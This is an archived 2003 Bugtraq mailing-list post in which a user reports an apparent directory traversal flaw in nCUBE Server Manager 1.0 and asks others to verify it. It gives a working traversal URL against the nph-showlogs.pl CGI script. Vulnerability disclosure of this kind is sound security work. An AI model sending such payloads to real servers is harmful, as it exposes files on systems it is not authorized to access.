[32354] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

nCUBE Server Manager

daemon@ATHENA.MIT.EDU (bug_hunt@hotmail.com)
Mon Nov 10 13:46:59 2003

Date: 10 Nov 2003 00:59:56 -0000
Message-ID: <20031110005956.22045.qmail@sf-www2-symnsj.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: <bug_hunt@hotmail.com>
To: bugtraq@securityfocus.com



can anybody verify this bug in 
nCUBE Server Manager (nSM) Version 1.0

i found a server where i can do a Directory Traversal!
using the following url:

http://server.com/cgi-bin/nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[32354] in bugtraq

nCUBE Server Manager

daemon@ATHENA.MIT.EDU (bug_hunt@hotmail.com)Mon Nov 10 13:46:59 2003

daemon@ATHENA.MIT.EDU (bug_hunt@hotmail.com)
Mon Nov 10 13:46:59 2003